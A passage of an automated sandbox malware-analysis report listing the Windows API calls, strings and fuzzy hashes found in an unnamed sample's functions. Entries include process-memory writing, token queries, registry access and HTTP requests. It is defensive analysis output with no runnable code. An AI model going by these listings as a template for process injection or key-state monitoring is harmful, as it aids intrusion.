                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3379773720-2594219639
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DC9FE,?,?,00000034,00000800,?,00000034), ref: 003E4D6B
                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003DCFC9
                                                                                                                        • Part of subcall function 003E4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003DCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 003E4D36
                                                                                                                        • Part of subcall function 003E4C65: GetWindowThreadProcessId.USER32(?,?), ref: 003E4C90
                                                                                                                        • Part of subcall function 003E4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CA0
                                                                                                                        • Part of subcall function 003E4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003DC9C2,00000034,?,?,00001004,00000000,00000000), ref: 003E4CB6
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003DD036
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003DD083
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                      • String ID: @$@U=u
                                                                                                                      • API String ID: 4150878124-826235744
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003E10B8
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003E10EE
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003E10FF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E1181
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: DllGetClassObject
                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E5A93
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 003E5AAF
                                                                                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003E5AF5
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004618F0,00000000), ref: 003E5B3E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0040B3E1
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 634782764-2594219639
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00400478
                                                                                                                        • Part of subcall function 003A7F40: _memmove.LIBCMT ref: 003A7F8F
                                                                                                                        • Part of subcall function 003AA2FB: _memmove.LIBCMT ref: 003AA33D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$BuffCharLower
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 2411302734-567219261
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003F4A60
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003F4A86
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003F4AB6
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003F4AFD
                                                                                                                        • Part of subcall function 003F56A9: GetLastError.KERNEL32(?,?,003F4A2B,00000000,00000000,00000001), ref: 003F56BE
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1951874230-3916222277
                                                                                                                      • Opcode ID: d13dfeb3a87e13d32e4c74c4764b0d94bb434da90ad274f019925689140ecd2e
                                                                                                                      • Instruction ID: fe00d52f5c7f5e49aecf2a76eed5c787084d6acd0e754384ce353b9a498cbcf1
                                                                                                                      • Opcode Fuzzy Hash: d13dfeb3a87e13d32e4c74c4764b0d94bb434da90ad274f019925689140ecd2e
                                                                                                                      • Instruction Fuzzy Hash: B421B0B6A4020CBFEB12DF64DC84EBB76ECEB89744F10402AF205D6150DB648D055764
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0041454E
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • _memset.LIBCMT ref: 003A3965
                                                                                                                      • _wcscpy.LIBCMT ref: 003A39B5
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003A39C6
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                      • Opcode ID: 57f53b2b1c392228c53561b95c899e842b6326c0797a56cf497b785e5474e361
                                                                                                                      • Instruction ID: d1ed1fcc621242e4923738b5bffb9d58b3dc6953e636e4bf486e77de7b284331
                                                                                                                      • Opcode Fuzzy Hash: 57f53b2b1c392228c53561b95c899e842b6326c0797a56cf497b785e5474e361
                                                                                                                      • Instruction Fuzzy Hash: F731B571409340ABD722EB50DC45FDB77E8EF46350F44452EF185861A1EBB4AA88CB97
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                        • Part of subcall function 003BC619: GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                        • Part of subcall function 003BC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00408F69
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00408F70
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00408F85
                                                                                                                      • DestroyWindow.USER32(?), ref: 00408F8D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: 64629a8055ece114a856f5a8a5f5251ab0ea5a0fb392c88a164fb80c5d4dc74a
                                                                                                                      • Instruction ID: b01b2b93437c093f2b45dc7833f4ac6964dacc81149941dfebdd358115cad2bc
                                                                                                                      • Opcode Fuzzy Hash: 64629a8055ece114a856f5a8a5f5251ab0ea5a0fb392c88a164fb80c5d4dc74a
                                                                                                                      • Instruction Fuzzy Hash: 3A219D71200206AFEF105E74DD40EBB37AAEB49328F10563EFA94A72D1CB79DC519768
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EE392
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 003EE3E6
                                                                                                                      • __swprintf.LIBCMT ref: 003EE3FF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0043DBF0), ref: 003EE43D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: 51466e2aff961a0ece96a8b50264807fe84d8920005afa540513bc59184c2240
                                                                                                                      • Instruction ID: 9dbe7c4d612794bdb9f55171cd4d463b2f2167e2a2306d76b95b5130e15390dd
                                                                                                                      • Opcode Fuzzy Hash: 51466e2aff961a0ece96a8b50264807fe84d8920005afa540513bc59184c2240
                                                                                                                      • Instruction Fuzzy Hash: 41214135A40108AFCB11EF65C885EEEB7B8EF49715F1040A9F505DB291D631DA05CB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                        • Part of subcall function 003DD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003DD640
                                                                                                                        • Part of subcall function 003DD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 003DD653
                                                                                                                        • Part of subcall function 003DD623: GetCurrentThreadId.KERNEL32 ref: 003DD65A
                                                                                                                        • Part of subcall function 003DD623: AttachThreadInput.USER32(00000000), ref: 003DD661
                                                                                                                      • GetFocus.USER32 ref: 003DD7FB
                                                                                                                        • Part of subcall function 003DD66C: GetParent.USER32(?), ref: 003DD67A
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 003DD844
                                                                                                                      • EnumChildWindows.USER32(?,003DD8BA), ref: 003DD86C
                                                                                                                      • __swprintf.LIBCMT ref: 003DD886
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 1941087503-1110647743
                                                                                                                      • Opcode ID: 8b95bc2dbf4c8253c47b6ec066f040f25efe671174e166add223ba2a1d3f98e1
                                                                                                                      • Instruction ID: dc7cff05e8a02cdaabdc4ca68fa4dfd06fd8ab3dae866524cc8eb5db1fdda7ee
                                                                                                                      • Opcode Fuzzy Hash: 8b95bc2dbf4c8253c47b6ec066f040f25efe671174e166add223ba2a1d3f98e1
                                                                                                                      • Instruction Fuzzy Hash: 9F1154766002056BDB237F50AC85FEA376DAB45704F0040BAFD19AE246DBB499459B70
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3970641297-2594219639
                                                                                                                      • Opcode ID: 7f0b2198a965f31808948913deed47a60d2056546e3b933010f956e7c3e828b2
                                                                                                                      • Instruction ID: f014245bc2b4904aceeea8f8e6f4c10f87ef38574c78523171f9525eaa379b04
                                                                                                                      • Opcode Fuzzy Hash: 7f0b2198a965f31808948913deed47a60d2056546e3b933010f956e7c3e828b2
                                                                                                                      • Instruction Fuzzy Hash: 1811A172A11548BFDB264FA08C40FEABB6DFF08358F0A1216FB0452020C735DC61DBA4
                                                                                                                      APIs
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004018E4
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00401917
                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00401A3A
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00401AB0
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364364464-0
                                                                                                                      • Opcode ID: b9b035eb08a4ba9b3f66d67f413fd9aaab2c92c7c5cc98056251fac883bb02ad
                                                                                                                      • Instruction ID: 5c9f7cb6cd291b79276999c7ae71835160ca485c1e9220a50647427b612f9854
                                                                                                                      • Opcode Fuzzy Hash: b9b035eb08a4ba9b3f66d67f413fd9aaab2c92c7c5cc98056251fac883bb02ad
                                                                                                                      • Instruction Fuzzy Hash: 0F818370B10204ABDF119F64C886BAEBBF5AF44724F14805AF905BF3D2D7B8A9418F94
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004005DF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040066E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040068C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004006D2
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 004006EC
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003EAEA5,?,?,00000000,00000008), ref: 003BF282
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003EAEA5,?,?,00000000,00000008), ref: 003BF2A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00402DE0
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402E1F
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00402E66
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00402E92
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402E9F
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003F17D4
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003F17FD
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003F183C
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003F1861
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003F1869
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                      • ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003DC156
                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 003DC200
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003DC208
                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 003DC216
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003DC21E
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 003F89CE
                                                                                                                      • GetForegroundWindow.USER32 ref: 003F89E5
                                                                                                                      • GetDC.USER32(00000000), ref: 003F8A21
                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 003F8A2D
                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 003F8A68
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      APIs
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003BB5EB
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003BB5FA
                                                                                                                      • BeginPath.GDI32(?), ref: 003BB611
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003BB63B
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: 18d86a13adaef16ebe645d0494d539ffbaab0c665ed584219eb9cca93e83e9a6
                                                                                                                      • Instruction ID: 68ecd17f9b4c9567d0b3a9042a136f67174ca4d65e4049e198ec378950a44dd5
                                                                                                                      • Opcode Fuzzy Hash: 18d86a13adaef16ebe645d0494d539ffbaab0c665ed584219eb9cca93e83e9a6
                                                                                                                      • Instruction Fuzzy Hash: CB217F70D00348AFDB21AF15DC457E9BBE8FB41319F180137E951935B0E7F548968B5A
                                                                                                                      APIs
                                                                                                                      • __calloc_crt.LIBCMT ref: 003C2E81
                                                                                                                      • CreateThread.KERNEL32(?,?,003C2FB7,00000000,?,?), ref: 003C2EC5
                                                                                                                      • GetLastError.KERNEL32 ref: 003C2ECF
                                                                                                                      • _free.LIBCMT ref: 003C2ED8
                                                                                                                      • __dosmaperr.LIBCMT ref: 003C2EE3
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2664167353-0
                                                                                                                      • Opcode ID: ea27aedb363b0981b36fc8d19375a4f5a3de0b1146b4a0f188aa0f5e034cedf9
                                                                                                                      • Instruction ID: 9b57f7fae03eb57386cf8fb9e6a6b0947e3b2a0383ef4442cb355294957da818
                                                                                                                      • Opcode Fuzzy Hash: ea27aedb363b0981b36fc8d19375a4f5a3de0b1146b4a0f188aa0f5e034cedf9
                                                                                                                      • Instruction Fuzzy Hash: 41118E32104706AB9722AFA59C41FAB7BA8EF44760B11042DFA14DA191EB319C118B64
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003DB903
                                                                                                                      • GetLastError.KERNEL32(?,003DB3CB,?,?,?), ref: 003DB90D
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,003DB3CB,?,?,?), ref: 003DB91C
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,003DB3CB), ref: 003DB923
                                                                                                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003DB93A
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 883493501-0
                                                                                                                      • Opcode ID: edc16fd91f89abf9937df0378d458336fc242baa7bf78fc0bf766f86391f6938
                                                                                                                      • Instruction ID: c19cc6e56758493f6a81011559bf735dd47df48f729ab396d56e8ccac10ba402
                                                                                                                      • Opcode Fuzzy Hash: edc16fd91f89abf9937df0378d458336fc242baa7bf78fc0bf766f86391f6938
                                                                                                                      • Instruction Fuzzy Hash: 02016D71601244BFDB214FA5EC88DAB7BADEF8A764B51002AF945C2250DB718C51DA68
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E8371
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003E837F
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E8387
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003E8391
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E83CD
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: d635854d50c0317ba6ca3ac87fedd96eb5c6494c87bb8e82f44dea300e6be3a7
                                                                                                                      • Instruction ID: b45ecf2dda04d5181715d801e76900800373f4e7c9d3ab943f6b67c43d8c1c49
                                                                                                                      • Opcode Fuzzy Hash: d635854d50c0317ba6ca3ac87fedd96eb5c6494c87bb8e82f44dea300e6be3a7
                                                                                                                      • Instruction Fuzzy Hash: 2701AD38E00629DBCF00AFE5EC48AEEBB78FB08B01F400251E405B2190CF709560C7A5
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.COMBASE ref: 003DA874
                                                                                                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 003DA88F
                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 003DA89D
                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 003DA8AD
                                                                                                                      • CLSIDFromString.COMBASE(?,?), ref: 003DA8B9
                                                                                                                      Similarity
                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 388ef81c13a5fc06d7a96d34879140f66043f50c4b77e195c0bdb79c104826f4
                                                                                                                      • Instruction ID: 8d8aa7672cfea084967405ad90985330845c983767ccac6eab3957615dc12a05
                                                                                                                      • Opcode Fuzzy Hash: 388ef81c13a5fc06d7a96d34879140f66043f50c4b77e195c0bdb79c104826f4
                                                                                                                      • Instruction Fuzzy Hash: 18012C76A00614ABDB225F54ED44B9ABFEDEB44752F154035BD01D2210D770DD42ABA1
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003DB7A5
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003DB7AF
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003DB7BE
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 003DB7C5
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003DB7DB
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 47921759-0
                                                                                                                      • Opcode ID: 4e0b313f28216902184a27c8919c9f1d35d3dc890436af769fca9df5d6b93759
                                                                                                                      • Instruction ID: d4c6e7b3bb283b958ee8f77e1762e44c91c6740eb11a1c50895bb1b3942f0421
                                                                                                                      • Opcode Fuzzy Hash: 4e0b313f28216902184a27c8919c9f1d35d3dc890436af769fca9df5d6b93759
                                                                                                                      • Instruction Fuzzy Hash: FEF04F72640205AFEB211FA5EC89EB77BACFF86755F51402AF941C7260DB609C428A60
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003DB806
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003DB810
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003DB81F
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 003DB826
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003DB83C
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 47921759-0
                                                                                                                      • Opcode ID: 177a92e508827fe0e70f13d2f168f22bb91e97053aeb3b7fa3b1c4600a44c76a
                                                                                                                      • Instruction ID: ba4b40d43f4c58a062386fc8c2f189df5cb18344c5e7efe059e1551051e8210f
                                                                                                                      • Opcode Fuzzy Hash: 177a92e508827fe0e70f13d2f168f22bb91e97053aeb3b7fa3b1c4600a44c76a
                                                                                                                      • Instruction Fuzzy Hash: 5FF04976600204AFEB221FA5FC88E7B7B6DFF4A755F11002AF941C7260CB609C52DAA0
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 003DFA8F
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 003DFAA6
                                                                                                                      • MessageBeep.USER32(00000000), ref: 003DFABE
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 003DFADA
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 003DFAF4
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      APIs
                                                                                                                      • EndPath.GDI32(?), ref: 003BB526
                                                                                                                      • StrokeAndFillPath.GDI32(?,?,0041F583,00000000,?), ref: 003BB542
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003BB555
                                                                                                                      • DeleteObject.GDI32 ref: 003BB568
                                                                                                                      • StrokePath.GDI32(?), ref: 003BB583
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2625713937-0
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003EFAB2
                                                                                                                      • CoCreateInstance.COMBASE(0042DA7C,00000000,00000001,0042D8EC,?), ref: 003EFACA
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • CoUninitialize.COMBASE ref: 003EFD2D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$+
                                                                                                                      • API String ID: 0-2552117581
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0043DC40,?,0000000F,0000000C,00000016,0043DC40,?), ref: 003E507B
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003AB8A7: _memmove.LIBCMT ref: 003AB8FB
                                                                                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003E50FB
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                      • String ID: REMOVE$THIS
                                                                                                                      • API String ID: 2528338962-776492005
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0043DBF0,00000000,?,?,?,?), ref: 0040A4E6
                                                                                                                      • GetWindowLongW.USER32 ref: 0040A503
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040A513
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003F57E7
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003F581D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                      • String ID: ?K?$|
                                                                                                                      • API String ID: 1413715105-774535530
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0040A74F
                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0040A75D
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0040A764
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040983D
